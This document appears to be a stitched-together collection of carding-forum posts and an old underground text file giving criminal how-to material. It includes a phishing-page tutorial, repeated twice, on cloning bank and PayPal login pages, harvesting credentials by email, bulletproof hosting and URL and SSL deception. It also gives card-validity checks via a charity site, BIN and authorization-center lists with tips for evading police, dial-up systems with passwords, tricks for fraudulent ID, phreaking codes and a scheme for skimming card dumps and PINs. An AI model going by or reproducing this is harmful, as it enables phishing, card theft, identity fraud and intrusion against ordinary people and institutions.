repetitive nature (lease pay, insurance reward, etc.) +with which the debitor authorizes his financial establishment to debit his current account when obtaining +of calculation on payment from the indicated creditor. +Electronic Fund Transfer (EFT) - the remittance of means, initiated from the terminal, telephone or +magnetic carrier (tape or diskette), by transfer of instructions or authorities to financial establishment, that +concern to the debiting or crediting of the account (see Electronic Fund Transfer/Point of Sale - +EFT/POS). +Electronic Fund Transfer/Point of Sale - EFT/POS - debiting from the electronic terminal, for the means +transfer purpose from the account of a buyer into the payment on the obligations, which arose in the +course of transaction at the point of sale. +Integrated Circuit (IC) Card - It is known also as chip card. Card equipped with one either several +computer micros-chip or integrated microcircuits for identification and storing of data or their special +treatment, utilized for the establishment of the authenticity of personal identification number (PIN), for +delivery of permission for the purchase, account balance checking and storing the personal records. In +certain cases, the card memory renewal during each use (renewed account balance). +Internet - the open world communication infrastructure, which consists of the interrelated computer +networks and which provides access to the remote information and information exchange between the +computers. +International Standardisation Organisation (ISO) - International organization, which carries out +standardization, with the staff office in Geneva, Switzerland. +Magnetic Ink Character Recignition (MICR) - System, which ensures the machine reading of the +information, substituted by magnetic inks in the lower part of the check, including the number of check, +the code of department, sum and the number of account. +RSA - the coding and autentification technology, developed in 1977 in MIT by Rivest, Shamir and +Adel'man, which subsequently opened their own company RSA Data Sechurity, Inc., purchased recently +by the company Security Dynamics Technologies, Inc. +Real-Time Gross Settlement (RTGS) - the payment method, with which the transfer of means is achieved +for each transaction in obtaining of instructions about the payment. Decrease the risk with the payment. +SSN (Social Security Number) - nine-digit number issued in US only to an individual. Its primary +purpose is to track individuals for taxation purposes. +Smart Card - card equipped with integrated circuit and microprocessor, capable to carrying out the +calculations. +System risk - the risk, with which the incapacity of one of the payment system participants either + +financial market participants as a whole to fullfill their obligations causes the incapacity of other +participants or financial establishments to fulfill its obligations (including obligations regarding the +realization of calculations in means transfer systems) properly. This failure can cause significant liquidity +or crediting problems and, as result, it can cause loss to the stability of financial markets (with the +subsequent action on the level of economic activity). +Truncation - procedure, which makes it possible to limit the physical displacements of a paper document, +in the ideal version, by the bank of the first presentation, by the replacement by electronic transfer of +entire or part of the information, which is contained on this document (check). +Tipper - a machine designed for use with PVC plastic cards to create raised print. (basically a plastic card +embosser) +COB - Change of billing. Used for online carding, to change the billing address of a card since Online +Stores will only ship large items if the billing and shipping address match. You can obtain these from +vendors in CP. Once you have this, you can easily change the card address to that of your drop so that the +stores ship items to your drop, since the billing and shipping addresses will match. +DOB - Date of birth of the card owner +Reply With Quote +Casino Scam +1. Design/Getting a scam page +So to start you will need a decent scam page, one that looks life the real deal a +nd will fool people into entering there details. Scam pages come in diffent forms +and sizes from a single page to multiple ones but as long as yours is accurate it +should work well. I have seen many scam pages or spam mail with countless spelling +and grammar mistakes, I advise everyone to use a spell checker and read through it a few times, if your +the language you are using is bad then ask someone who is +fluent in that language to check it. +Designing your own scam page: +I do not know much about designing your own apart from the basics, there are +others who are advanced and can add things like security lock and incorrect entry errors +but for now you should start off with basic stuff. +1. Go to the webpage that you are wanting to replicate. +2. File, view source, notepad or similar program should open with alot of text. +3. Save somewhere safe and close. +4. Open and copy the source to a web design program, i would suggest +'Microsoft Front Page Editor' as it can be downloaded for free and is easy to use. +5. Edit the webpage to suit your needs. +6. Go back to the source and now you will have to edit a few lines of it so +that the entires are sent to you ( I cannot at this time remember what lines +to edit so i will edit this shortly) +Or to make the above a little bit more easier, you can download the following + +program and rip an entire site for you to play around with in your choosen +web design program.. +BlackWidow - http://sbl.net/Downloads/BlackWidow%20Setup.exe +It has a 30 day trial restriction but a quick net search and you should be +able to get a crack. +Using free scam pages: +Here are some free scam pages, thanks to Magister and blacksabbath who +spent time creating them and gave them away at no cost, they are pretty +decent and should work well. There are full versions of the e-gold and +paypal scam page so if you would like that you can buy them +off Magister. +E-gold - http://www.glcco.com/invision/source...old%20LITE.zip +Paypal - http://dataonesoftware.com/html/them...les/PayPal.zip +eBay - coming soon +AOL - http://blacksabbathpagez.tripod.com/aolsc.zip +BankOne - http://blacksabbathpagez.tripod.com/bankone.zip +Copy and past the links into a new browser as hotlinking might not work. +The files are zipped so use winrar or a similar program to unpack them. +Buying scam pages: +You can by very proffesional scam pages from a few vendors, price varies on how +good the page is, some vendors i would suggest are: +Magister (CP) +Aphrodite (CP) +1.1 Setting Up Scam page (Getting details sent to email, icq etc) +To make the details get sent to you, you will have to edit a few lines in one +file which has to be done to the ones you are using. In the files specified +below find the line mail("you@you.you") and change the part in brackets +to your email. +E-gold - access.htm is the start page, set mail address at acct.php +Paypal - login.html is the start page, set mail address at paypal.php +eBay - coming soon +AOL - aol.comsupport is start page, set mail address at process.php +BankOne - SecurityUpdate is the start page, edit same line when viewing source + +on SecurityUpdate +1.2 Hosting Scam page +You will need to find a stable anon host which will allow you to keep your +scam page up for a few days, most hosts will take it down as soon as they +notice or get complaints about it so choosing a good host is important. +OffShore Hosts -Look for a host that is situated in a different country +as they do not really care what it is used for and have slow/weak spam and +fraud control, offshore hosts are always good for this sort of work. +Radmins - If you have some spare money i would suggest ivesting in one or +two radmins, radmins are computers you have full remoute access to so you +can do whatever you want with them. A radmin with a good speed can do +many things from hosting to spamming and browse for them so they are good +investment for scam page users. Radmins can last for a long time depending what +they are used for but for scam pages the average is around 2weeks which is more +than enough time for your scam page. Look around and you should be able to +find a reputable seller of these however be careful as there are alot of rippers +selling these. +Bulletproof Hosts - I do not know much about this type of host but it seems some +people like to it to host scam pages because of it being anon,fast, reliable and it +allows its users to advertise by spam unlike some hosts which will take your site +down if spam complaints are recieved. +Other hosts - Look around and spend some time trying out different hosts and you +are sure enough to find a few good ones for scam pages, use a CC to card the +accounts as it would be stupid to pay for it unless its reliable and anon. +1.3 Other +Here are a few methods to make your scam page look even more authentic, +I have not tried these but here is some information from those that have.. +Fake Address bar - +You create an activex floating white window the size of the address bar and +place the x/y values of it where the normal address bar would be. Works perfect, +however if they're not in full screen mode ur FUCKED. +Example - http://www.doxdesk.com/personal/post...3-ie/bank.html +Also depending on resolution the effect varies. +Fake URL - +You can mask the URL of your host by using this old (but still working) technique +http://%00%01@/ + +So +www.paypal.com/" target="_blank" rel="nofollow">http://www.e-gold.com.@www.paypal.com/ +Magic!! +It takes you to the paypal site but shows www.e-gold.com in the address bar... +Fake SSL certificate - +To get the lock at the bottom right of your screen on your scam page you will +need to use a host that gives you the certificate as part of the package, the +user who is viewing the scam page will have to click yes on the alert box that +comes up and the padlock will be shown, this is good for sites like e-gold which +tell the user to check for the padlock before logging in. +http://www.apache-ssl.org is a good site to get you started with a host with ssl cert. +CHECKING FOR AVS (CARD AND BILLING ADDRESS +MATCH) +If you want to check a credit card for verification match up on avs (registered biling address) and credit +card number. +Then please feel free to use the web site: get up and donate charity site +weblink:www.getup.org.au/donate +This site approves when there is a direct match between the card details and billing address. +Billing address and card details valid match is vital when trying to a card and ship good's online. +Cvv Carding Tutorial #3 +INTRODUCTION: +C=The *use* of our credit system for personal gain & financial freedom! +H=The practice of accessing *secure* computers with innovative techniques/skill. +I=Assuming or establishing a *new* guise by "creating" an identity on paper. +P=The know-how and interest in the telecom industry and the services it provides +Hi-?! +Issue two already! I just finised #-01 about a week ago, and already I feel +I have enough text & information of interest to warrant a quick follow-up to +#-01! ....so here it is, #-02! I hope #-01 has provided those who have read it, + +something to think about and/or "work on". If not, well then perhaps this one +will. If not, then perhaps a monastery or convent would be a better place for +the likes of you!! +II.> PART 2- +\|/ +?[>*C*H*I*P*=>! +*C* - CARDING> /|\ +Intro: +Below are as many BIN's as I could round up. Each one is listed according to +the Banks ID No. (BIN) - which are the first 6 nos. of a CC. (Credit Card). +Of course, the first no. indicates a Visa (4) or a Mastercard (5). Bin's aren't +all that important to know, but can be if you NEED to know the name of a bank +that issued the CC no. you have. +So FYI and bemusement, here's that information- +BANK IDENTIFICATION NUMBERS: +^^^^ ^^^^^^^^^^^^^^ ^^^^^^^ +~~VISA BINs~~ +^^^^ ^^^^ +*4000-4999* +401903 = Bank of America +402400 = Bank of America +402402 = Bank of America (Gold) +403200 = Household Bank +4040?? = Connecticut National Bk +4040?? = Wells Fargo +4050xx = 1st Interstate +4052?? = First Cincinnati Bank +405209 = First Nationwide Bank +4060?? = Navy Federal Credit Union +407000 = Security Pacific Ntl. Bank +407129 = Colonial National Bank +411427 = Chemical Bank +412174 = Signet Bank/Virginia +412185 = Citibank/Signet? +41235? = Commerce Bank +4128xx = Citibank +416818 = Great Western Bank +4131?? = State Street Bank +4170?? = Beneficial National +417129 = Colonial Bank +4188?? = Ohio Savings & Loan +4211?? = Chemical Bank +4215?? = Marine Midland +422591 = Chase Manhattan +4226xx = Chase Manhattan +4231?? = Chase Lincoln 1st Classic +4232?? = Chase Lincoln 1st Classic + +4237?? = Cicero Credit +4241?? = Natl. Westminester Bank +425043 = First Chicago Bank +425330 = Bank of N.Y./Consumer Edge +425451 = Chemical Bank +4262xx = Corestates Bank of DE +427138 = Citibank +4302?? = HouseHold Bank +431068 = Bank-Layfayette/Imprl Svg's +4312?? = Barnette Credit +431301 = Valley Federal S&L +431663 = Glendale Savings & Loan +431772 = Gold Dome +4321?? = Mellon Bank +433213 = Bank of Indiana +433222 = Far West Virginia +4349?? = First Bank of America +436800 = Sovran Bank/VA +438733 = Bank One +438760 = More Bank +440121 = Gary Wheaton +440862 = Charleston of Indiana +441712 = Mellon Bank +442813 = Bank of Hoven +442843 = " " " " +44288? = Colonial National Bank +443600 = Security Bank of Monroe +4448?? = First National Bank - RI +46165x = First Interstate Bank +4626?? = Indiana National Bank +4646?? = Mercantile +4672?? = Mercantile Bank +467362 = First National Bank; +467807 = Home Fed Svg's/1st Card +467808 = Home Fed Svg's/1st Card +468120 = Harris Trust Savings +4696?? = Credit of Kansas +4718?? = Colorado Bank +4734?? = Madison Bank +480012 = Valley Federal S&L +4811?? = Bank of Hawaii +4825?? = First Wisconsin +4897?? = Village Bank of Cinn., OH _________ +/ Here are \ +4929?? = Barclay Bank/DE | what the | +^ | holograms | +| | SHOULD show!| +| \_____ _____/ +*BIN* = #### ## (1st 6 nos.) Y +| | +| _____________________________|______ + +| [ | ] +^ | MASTERCARD INTERNATIONAL___v____ | +| | [ v+===\*] | +/--<+-->| 5555 1234 5678 9012 [ | I|] | +| | ^^^^ ^^ ] Q I|] | +| +==>| 6512 11-91 TO 11-92 [ /|\ I|] | +| | | ^^^^ [_/^\_ I=] | +| | | JUSTIN CASE MD [________] | +| | | | +| | [____________________________________] +| | +| *-==>IBN* = #### (above cardholder's name) +| | +| | +A>|M/C's | +==v===== v +1st- X IBN. +###### X #### Bank/Institution Name +^^^^^^ ^ ^^^^ ^^^^ ^^^^^^^^^^^ ^^^^ +5000-5399 +========= +5031?? = #? -Maryland Bank MBNA +5127?? = 1015 -? +520400 = 1006 -Security Pac Ntl Bk +521142 = 6142?-Chemical Bank +521531 = 6207 -Marine Midland +521795 = 1033?-Manufacturers Trust +5218?? = #? -Citibank N.A. +523080 = #? -Harris Trust Svgs +5233?? = 1226 -Huntington Bank +524200 = 6066 -Chevy Chase F.S.B. +5250?? = 1260 -? +525400 = #? -Bank of America-ca +525402 = #? -Bank of America-pa +5263?? = 1263 -Chemical Bank +5272?? = #? -Connecticut Ntl +5273?? =p #? -Bank of America +527706 = #? -FIB +52820? = #? -Wells Fargo +5286?? = #? -Chase Lincoln 1st +5286?? = 1286 -Home Fed Savings +528707 = #? -Valley National Bank +529107 = 1001 -Signet Bank/VA +529801 = #? -Bank One +5317?? = #? -Norwest Financial +5323?? = #? -Bank of New York +532903 = 6017 -Maryland Bank; MBNA +532956 = 6017 -Maryland Bank; MBNA +539655 = 7462 -Universal Bank/AT&T +539855 = 7462 -Universal Bank/AT&T +5400-5999 +========= + +540126 = 6017 -Valley Federal S&L +540193 = 8084 -Fidelity Investors Bk +541037 = 6037 -Wells Fargo NA +541065 = 6785 -Citibank NA +541085 = 6785 -Citibank NA +541116 = #? -1st Financial/Omaha +541169 = 1169 -1st Financial/Omaha +5412?? = 6037 -? +5414?? = #? -Ntl. Westminster Bank +5415?? = #? -Colonial National Bk +541586 = 1586 -HouseHold Bank +541711 = 1711 -? +541919 = #? -FIB +541933 = 1933 -Bank of Hoven +541934 = #? -Berthoud Ntl Bk +542096 = #? -Colonial Bank +542143 = 2143 -? +54224x = 1049 -MHT +542418 = 1065 -Citibank +5432xx = #? -Bank of New York +5455?? = #? -PSFS +5464?? = 1665 -Chase Manhattan +546598 = " " -Chase Manhattan +5601?? = 1352 -FIB +5678?? = 1207 -Marine Midland +591210 = 6282 -Wells Fargo +xx= All nos. in series are that bank's. +??= Unsure of full IBN/BIN no. +B> - Authorization Centers - ("AC") +Intro: Authorization Centers are located throughout the country and are in just +about every financial institution that is involved in the distribution and/or +issuance of credit cards. Of course, Visa and M/C have some as well. +Citibank, First Interstate Bank and Bank of America all have their own AC's +available to their merchants. There are however many other AC's that provide the +same types of services to their merchants. It is the merchant who is 'really' +providing the services though. It is the merchants responsibility in most cases +to determine that a credit card is valid. On top of that they are also even +offered a whole $50 if they assist in the conviction of anyone suspected of +using a stolen/forged card. $50!! Hardly worth it, so most don't even try.... +One of the quickest ways a card is checked is by accessing an AC through a +card reader. Verifone is perhaps the largest mfg. of these devices, which are +used by most retail stores or restaurants for CC verifications. +The telephone no. that is called using one of these card readers is the +first one in which I've listed below. You can also log onto this "carrier" via a +a modem, but I've yet to figure out what the necessary input is to utilize this +service on my computer. A touch tone phone suffices however, and the required +input is listed below for using this particular AC (Authorization Center). + +One other thing to note here is that whenever you are at a store/merchant +and using a shady (at best) card, be especially alert to the merchant and/or +cashier when they are getting verification of the transaction. If they use +the telephone and voice in the request for the authorization, then listen +for "Code-10", and if you hear them say this at any time- GET THE HECK OUT!! +If they use a card reader for the transaction and get something like "CALL +CENTER" on the read out, then remain calm and ask what the problem is, and if +at anytime they are out of sight or on the phone with the center for +any prolonged amount of time, then again- GET OUT OF THERE!! +A "code-10" is a merchant's signal to an authorization center that they are +suspicious of the card user. If you are using an AMEX, then run out of there +twice as fast, because AMEX calls the police from their authorization center. +V/MC don't usually call the police, but AMEX will use stall tactics while the +police are on the way. (One way is to ask to speak with you and then ask you +some rather lengthy detailed questions, like primary cardholders name, SSN & +Mother's Maiden). You can always just look out the window and exclaim, "Hey! +someone's stealing/towing my car!" and then leave pronto!.... +** Use the following telephone nos. before going into ANY store to use a card. +They are worth the extra minute or so to be sure that the card is still valid! +1>. +800/228-1111 = On-Line Auth. Center (300baud)/Touchtone Ok too. +Merchant No.#Card No.#Exp.Date#Amt# **push the "#" after each entry** +(Merch No.=A 16 digit-#; 1st no. is 4 or 5 & can often be found on carbons +just above the merchants name.) +2>. +800/228-2211 = This is the voice authorization number of the same group +who operate the one above. I am fairly sure that these two are operated by +M/C and Visa, and I do know that the merchant nos. that work on one, also +work on the other. This AC, is also useful for obtaining a BIN no., and/or +the issuing bank of a particular credit card. Just ask the verification op. +for merchant services and she will connect you to their information dept. +3>. +800/554-2265 = Bankcard Auth. Ctr. +For MasterCard: 1067#52#10#CardNo#Exp#$$$$# +For Visa: 1067#24#20#CardNo#Exp#$$$$# +4>. +800/528-2121 = American Express Auth. Ctr. (Amex only) +Live ops! - Give: (**Merch#+card#+expdate+amt) **=5041035528 +Merch. No. is for: Popolos Ristorante; 8115 Melrose LA,Ca. 90069 +5>. +800/327-3584 Authorization Center for Visa & M/C +***** Merchant No. format is: 101 ### ###; #= unknown no. +6>. +800/645-9120 Merchant Service Center for Citibank; NA +****** Merchant No. format is: ### ### ### ### (the one I had is no longer + +[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] +Glossary of terms used in the preceding text file. +- Authorization Center = Voice and/or Data terminal which gives merchants +varying "approval codes" on purchase requests. Some also provide info such as +BIN No. and Bank Name of a particular card. +- Bank Identification Number = Issuing bank's identifier. This number is +assigned by the FDIC, I think. The No. can be found on Visa's (unraised) +just above the CC number. Some larger banks will have several BIN's, because +they own several smaller financial institutions that issue credit. +Choice Visa is one example. They are owned by Citibank, but have there own +seperate BIN. Another example is First Card, which handles Home Fed Savings +credit accounts. +- International Bank Number = Bank Identifier on a national level. The +number is used by various merchants to verify/approve a cardholder when they +have placed a telephone or mailorder request. It is the 4 digit no. just +above the persons name, and is only found on M/C's (raised, 'usually' starts +with a 1,6,7 or Cool & on Amex cards (unraised, usually starting with a 6). +Though not an absolute, experience has shown that IBN's starting with 6,7 or +an 8, are usually preferred accounts. IBN's that begin with a 1 or 2 are +usually found on classic accounts. (see list above) +- CV = Classic Account; -these two letters can be found on most Visa cards +that are "Classic Accounts". They usually have a credit limit of some- +where between $500 to $5000+, though some can go up to $10,000 for long term +customers. +- PV = Preferred Acct. or "Gold Card"; -usually limits of 5,000-10,000+. These +cards are 'usually' found on Gold or 'preferred Visa Cards, and are worth +their weight in 'gold' as well.... Some can go up to $40,000 or more!! +++Any additional articles or noteworthy texts to be submitted for inclusion +in the future issues of *CHIP*, should include a handle &/or method of contact +for the author. Though not required, this will help in verifying the info & +assure a timely publish date. +Our method of contact is simple. Call 800-755-3493, press 9657 before end of +greeting and give us some idea of what you know or have access to and we will +consider your request. The only other method we feel safe with is via a typed +letter sent to: *JC/CA* 15445 Ventura Blvd. #128; Sherman Oaks, CA 91403. We +need more up to date H/P info since this is not our best subject and since +there are many others more knowledgable in this field than we are... So let us +know! ...Otherwise we may change *CHIP* to CIA! & become Anarchist!... then +again, it's probably too late for that, since we do as we want anywayz..-JC/CA>. +III.> PART 3: +\|/ +?[>*C*H*I*P*=>! +/|\ +*H* - HACKING> +Intro: + +Hacking Numbers & Carriers! These may also be added to the EXTENDER.DAT +files of most Hacking/Phreak programs, when reliable carrier no(s) are +needed. +* Telephone No= Pwd &/or Locale * Telephone No= Pwd &/or Locale +------------------------------- ------------------------------ +206-863-0015= ? 800-325-1171= ? +206-863-3963= ? 800-325-1340= ? +206-863-3700= ? 800-325-1341= ? +206-863-0426= ? 800-325-1342= ? +206-863-1150= ? 800-325-1436= ? +206-863-1183= ? 800-325-1401= ? +208-772-6134= ? 800-325-1471= ? +619-723-8996= ? 800-621-3224= ? +919-323-9888= ? 800-621-3592= ? +214-263-3109= ? 800-621-3678= ? +206-825-7206= ? 800-621-3679= ? +206-825-7598= ? 800-228-1111= ?M/Card-Visa +206-825-7621= ? 800-334-4000= ?Message system +206-825-7781= ? 212-370-4303= Cosmos NY +206-825-6132= Try ctrl-x for prompt 313-855-0203= CosmosMI:ONNERR +206-825-7905= ? 213-892-7211= Compuserve +206-825-9000= Montgomery Ward 213-355-5241= Electronic News +206-833-5329= Wont connect properly 800-555-8677= Ma Bell +206-825-6234= Oil Company 800-424-9440= Bank +206-931-4879= Auburn High 213-932-8294= Secret Service +206-872-4690= Kent High 405-332-9998= Belle Co-puter +414-476-8010= Milwaukee High 713-241-6421= Shell Oil +206-771-6551= Tacoma School.P/w=VAXE 713-526-0149= Hospital +206-825-7720= Compuserve 913-343-1042= Calling card +312-499-2100= Sears 502-588-6020= Uof Louisville +617-683-2119= Hospital 502-588-6036= " " " +800-424-9494= Telenet 213-417-8997= TWA +800-421-2123= ? 800-828-6321= IBM Computer +800-558-0001= AGRODATA 206-828-3598= Microsoft +206-357-7350= Ctrl-data-publishing 800-526-3174= RCA Mainframe +414-354-0010= T.Y.M.E. Corp. 312-937-1210= ? +202-553-0229= PENTAGON 206-833-6352= ? +202-697-0814= PENTAGON 206-833-6364= ? +304-376-2488= Savings & Loan 202-553-0229= T.A.C +313-964-2018= Charge card Association N/A-950-1288= AT&T Info Service +206-833-6133= ? 206-833-6134= ? *P/w For Milwaukee High GNIK, Code:4,71 +800-522-5465= Lab Link **P/w For Ma Bell 948DJU47R +202-694-0004 User Id= Cohen +=========================================================================== +==== +ABC East Coast feed 213 935-1111 +Try this # 206-825-2377, hit return a couple of times and you'll get ENTER +PASSWORD then hit ControL 'U' a few times then hit return. you in +simple.. Or try mashing keys until it says 'ART GAMBLIN - CHEVROLET'... +III.> PART 4- + +\|/ +?[>*C*H*I*P*=>! +/|\ +I - IDENTITIES +Intro: +DMVRULES.TXT +What the DMV would rather you DIDN'T know: + 10-01-90 +13.301a: +"...If the applicant is unable to provide a signature within the margin, the +application should nevertheless be accepted, and there is NO need to prepare +another application..." +13.301b: +..."Usual signature" means the signature the applicant uses when signing +letters, "checks", etc. It need not correspond exactly to the full name as shown +at the top of the application or photo document & and in fact, seldom will. If +the signature includes a nickname not shown in the full name, or if it differs a +lot from the full name, the employee should indicate "usual signature" in the +space at the top of application. +13.301c: ***important*** +If the applicant's, "usual signature" is "printed", it should be ACCEPTED on +the application. +13.307: Birth Date Verification +Any Driver license showing birth date is acceptable in lieu of a birth +certificate (bc). If the bc is unobtainable, certain other documents may be +accepted in lieu of the bc. The acceptability of other documents should "NOT BE +DESCRIBED TO THE APPLICANT" until it is reasonably ascertained that their birth +record is unobtainable. +The following ARE accepted forms of identification as listed in the +DMV Employees Driver License Tech. Manual: +<<< in order of preference.... their preference, of course! >>> +1>. Birth Certificate or any "certified Birth Record/Registration". +2>. Driver License, from CA. or an ID card issued by the State of CA. +3>. All other state Drivers licenses, Id cards, to include Military too +4>. Any foreign governments D/L and/or ID. Must have DOB listed on it. +5>. Passports, Visas, immigration/alien docs or reg. cards. w/ DOB. +6>. Dept. of Corrections or Youth Authority docs, signed by PA/CS/CAS. +7>. Driver Education driving permits & training certificates, w/ DOB's. +8>. Out of State ID cards -NOT necessarily issued by the state's DMV. +9>. US Census Records. Auth. by 13007.5 VC; ** contact Census Bureau ** +10>. School Cerification (form dl-48); used ONLY when all other forms of Proof +of ID have been exausted; *contact any local school to get rcrds*. This +is also an accepted form of ID for SSA (Social Security Administration). +** Note: + +Tax forms are not accepted with any degree of certainty by the DMV. It's +always best to use what they see "thousands of time a day", since these docs +are usually less scrutinized. +If you have trouble getting the above docs, then just go to Nevada. In NV +they take almost every Type of ID known in the US. Included in what they will +accept are W-2 tax forms & 1099 gift-tax forms. Armed with one of these and a +baptismal certificate you can get a NV ID/DL with no problem, and on the same +day as well. NV is one of the few states that accept Baptismal Certificates. +.... and Just'in Case you ddidn't know that, Bap. Certs. can be found at most +at most religious bookstores & supply stores, especially Catholic. +An added bonus is that they DO NOT fingerprint in NV. You also have the +option of having your ssn imprinted on the ID card, which is helpful for back- +up ID. You just tell them your ssn and they'll include it. One bad thing is +that there is no Exp. date on their ID cards, however there Driver Lic's. do +have exp. date's and are worth the extra "drive" around the city to get. The +best days to go are on Tuesdays or Wednesdays. +***Now here are a few additional points of interest to note for the heck of +it, so here goes.... +*= THE =* +**- APPLICATION -** +II.> Driver Information and the Application. +Quickly, there are 5 types of forms used by the DMV in processing such re- +quests as DL, ID, Replacement (of either), Computer paper & the renewal appli- +cation form (DL-1RN). BTW, according to this doc that I am sorta copying, it +says that the renewal process will and is being phased out with "the new system +now being installed". *CA has seen perhaps the very first of this 'new' system.* +13.011 +Every applicant for an original, or renewal, driver license whose form DL-44 +indicates previous driving experience, but who does not indicate or produce a +previous license, should be asked whether he/she holds a regular license from +California or any other state or country. The reason for the inquiry (Sec-12511 +& 12518vc) should be "politely" explained. Instruction or learner's permit & +"International Drivers Licenses" are not considered to be regular licenses. If +an applicant over the age of 18 cannot produce a valid or recently (within one +year) expired foreign license, a check by H-6 inquiry to the automated sys. +or Wats Line must be made prior to processing of the application. ++++H-6 inquiry to automated sys OR WATS line sounds like a hacking adventure!.. +Anyone with info on this possibility please fill us in at 800/755-3493 x-9657. +IV.> PART 5: +\|/ +?[>*C*H*I*P*=>! +/|\ +*P* - PHREAKING> +Intro: + +950XXXX.LST +Here is a current list of operating L/D Co's, which provide access to +telco. lines across our fine country (ha!)... Of course what makes it so fine +is that with each of these L/D carriers, there is a code that is entered to be +able to access the fine features of each of these fine L/D service providers. +So someday with nothing better to do, give 'em a try and try out different +access code numbers (randomly), and hopefully you'll be able to make FREE phone +calls in no time. Don't abuse it however, because they do tend to monitor any +high usage on these numbers. +[-------------------------------------------------------------------------] +| 950- | Code Format | Name of Company | Comments | +[-------------------------------------------------------------------------] +| 0223 | 6 digits + acn | Cable and Wireless | Business/calls overseas | +| 0266 | 7 digits + acn | Com Systems | MC/V/AE w/o exp-ok! Hit "0"| +| 0370 | 7 digits + acn | LDS | Long Distance Services | +| 0488 | acn + 13 digits| ITT | | +| 0511 | 6 digits + acn | Execuline | | +| 1022 | 0 + acn + 14dig| MCI Execunet | Calling card - 14 digit # | +| 1033 | 0 + acn + 14dig| MCI | Calling card - 14 digit # | +| 1044 | 6 digits + acn | Allnet | | +| 1050 | 6 digits + acn | Metrophone | | +| 1055 | 6 digits + acn | Telesphere | MC/V/AE ok too!! push "0" | +| 1407 | 7 digits + acn | TMC Watts #1 in CA | | +| 1408 | 7 digits + acn | TMC Watts #2 in CA | | +| 1444 | 9 digits + acn | Allnet | International Access also | +| 1555 | 6 digits + acn | Telesphere | | +| 1621 | 9 + acn + 6dig#| na | 9 + acn + 6 digits? | +| 1772 | code + acn | na | Voice for "access code" | +| 1820 | na | BizTel | | +| 1979 | 6 digits + acn | VorTel | | +| 1999 | 6 digits + acn | ITT | 800/275-0100 for account | +[-------------------------------------------------------------------------] +Design/Getting a scam page (Casino) +1. Design/Getting a scam page +So to start you will need a decent scam page, one that looks life the real deal a +nd will fool people into entering there details. Scam pages come in diffent forms +and sizes from a single page to multiple ones but as long as yours is accurate it +should work well. I have seen many scam pages or spam mail with countless spelling +and grammar mistakes, I advise everyone to use a spell checker and read through it a few times, if your +the language you are using is bad then ask someone who is +fluent in that language to check it. +Designing your own scam page: +I do not know much about designing your own apart from the basics, there are + +others who are advanced and can add things like security lock and incorrect entry errors +but for now you should start off with basic stuff. +1. Go to the webpage that you are wanting to replicate. +2. File, view source, notepad or similar program should open with alot of text. +3. Save somewhere safe and close. +4. Open and copy the source to a web design program, i would suggest +'Microsoft Front Page Editor' as it can be downloaded for free and is easy to use. +5. Edit the webpage to suit your needs. +6. Go back to the source and now you will have to edit a few lines of it so +that the entires are sent to you ( I cannot at this time remember what lines +to edit so i will edit this shortly) +Or to make the above a little bit more easier, you can download the following +program and rip an entire site for you to play around with in your choosen +web design program.. +BlackWidow - http://sbl.net/Downloads/BlackWidow%20Setup.exe +It has a 30 day trial restriction but a quick net search and you should be +able to get a crack. +Using free scam pages: +Here are some free scam pages, thanks to Magister and blacksabbath who +spent time creating them and gave them away at no cost, they are pretty +decent and should work well. There are full versions of the e-gold and +paypal scam page so if you would like that you can buy them +off Magister. +E-gold - http://www.glcco.com/invision/source...old%20LITE.zip +Paypal - http://dataonesoftware.com/html/them...les/PayPal.zip +eBay - coming soon +AOL - http://blacksabbathpagez.tripod.com/aolsc.zip +BankOne - http://blacksabbathpagez.tripod.com/bankone.zip +Copy and past the links into a new browser as hotlinking might not work. +The files are zipped so use winrar or a similar program to unpack them. +Buying scam pages: +You can by very proffesional scam pages from a few vendors, price varies on how +good the page is, some vendors i would suggest are: +Magister (CP) +Aphrodite (CP) +1.1 Setting Up Scam page (Getting details sent to email, icq etc) + +To make the details get sent to you, you will have to edit a few lines in one +file which has to be done to the ones you are using. In the files specified +below find the line mail("you@you.you") and change the part in brackets +to your email. +E-gold - access.htm is the start page, set mail address at acct.php +Paypal - login.html is the start page, set mail address at paypal.php +eBay - coming soon +AOL - aol.comsupport is start page, set mail address at process.php +BankOne - SecurityUpdate is the start page, edit same line when viewing source +on SecurityUpdate +1.2 Hosting Scam page +You will need to find a stable anon host which will allow you to keep your +scam page up for a few days, most hosts will take it down as soon as they +notice or get complaints about it so choosing a good host is important. +OffShore Hosts -Look for a host that is situated in a different country +as they do not really care what it is used for and have slow/weak spam and +fraud control, offshore hosts are always good for this sort of work. +Radmins - If you have some spare money i would suggest ivesting in one or +two radmins, radmins are computers you have full remoute access to so you +can do whatever you want with them. A radmin with a good speed can do +many things from hosting to spamming and browse for them so they are good +investment for scam page users. Radmins can last for a long time depending what +they are used for but for scam pages the average is around 2weeks which is more +than enough time for your scam page. Look around and you should be able to +find a reputable seller of these however be careful as there are alot of rippers +selling these. +Bulletproof Hosts - I do not know much about this type of host but it seems some +people like to it to host scam pages because of it being anon,fast, reliable and it +allows its users to advertise by spam unlike some hosts which will take your site +down if spam complaints are recieved. +Other hosts - Look around and spend some time trying out different hosts and you +are sure enough to find a few good ones for scam pages, use a CC to card the +accounts as it would be stupid to pay for it unless its reliable and anon. +1.3 Other +Here are a few methods to make your scam page look even more authentic, +I have not tried these but here is some information from those that have.. +Fake Address bar - + +You create an activex floating white window the size of the address bar and +place the x/y values of it where the normal address bar would be. Works perfect, +however if they're not in full screen mode ur FUCKED. +Example - http://www.doxdesk.com/personal/post...3-ie/bank.html +Also depending on resolution the effect varies. +Fake URL - +You can mask the URL of your host by using this old (but still working) technique +http://%00%01@/ +So +http://www.e-gold.com.@www.paypal.com/ +Magic!! +It takes you to the paypal site but shows www.e-gold.com in the address bar... +Fake SSL certificate - +To get the lock at the bottom right of your screen on your scam page you will +need to use a host that gives you the certificate as part of the package, the +user who is viewing the scam page will have to click yes on the alert box that +comes up and the padlock will be shown, this is good for sites like e-gold which +tell the user to check for the padlock before logging in. +http://www.apache-ssl.org is a good site to get you started with a host with ssl cert. +PART TWO ON SPAMMING WILL BE COMPLETED SOON. +Dump + PIN from POS +The best POS (Point Of Sale System) to use to get dump (track 1 and 2) and PIN on. For all carders who +work or have connections with people who work in Bars, Cabs, Delivery service. +When the customer uses their card and punches in the PIN this POS stores the PIN. And HEY! you get +the dump + PIN. +So from now Dump + PIN is not only a myth. +Below is the details and model numbers vx670 - read up some more and hopefully before the end of +Novemeber 2011, I will have some for intretsed and professional members. +1.vx670 - wireless + +2.vx670 - wired 